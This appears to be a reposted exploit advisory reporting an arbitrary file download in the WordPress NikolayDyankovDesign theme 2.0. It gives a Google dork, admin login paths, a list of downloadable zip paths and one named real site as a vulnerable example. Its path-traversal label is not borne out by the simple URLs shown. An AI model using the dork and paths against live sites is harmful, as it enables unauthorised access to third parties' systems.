WordPress NikolayDyankovDesign 2.0 Arbitrary File Disclosure

WordPress NikolayDyankovDesign theme version 2.0 suffers from an arbitrary file disclosure vulnerability.


MD5 | 7319655844999b939030dbbc03848d4e

#################################################################################################

# Exploit Title : WordPress NikolayDyankovDesign Themes 2.0 Arbitrary File
Download
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : pinterest.com/nikolaydyankov/ ~ nikolaydyankovdesign.com
~ semsoft.ca
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0 and 2.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/nikolaydyankovdesign/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

#################################################################################################

# Admin Panel Login Path :

/demox/admin/
/wp-log

# Exploit :

/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip

/wp-content/themes/nikolaydyankovdesign/documentations/flipper-for-wordpress-2-0.zip

/wp-content/themes/nikolaydyankovdesign/documentations/flipper.zip

/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map-for-wordpress.zip

/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map.zip

/wp-content/themes/nikolaydyankovdesign/documentations/timeliner-for-wordpress.zip

/wp-content/themes/nikolaydyankovdesign/documentations/timelinexml.zip

/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline-for-wordpress.zip

/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline.zip

#################################################################################################

# Example Vulnerable Site =>

[+]
photobook.com.tr/demox/siparis/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Related Posts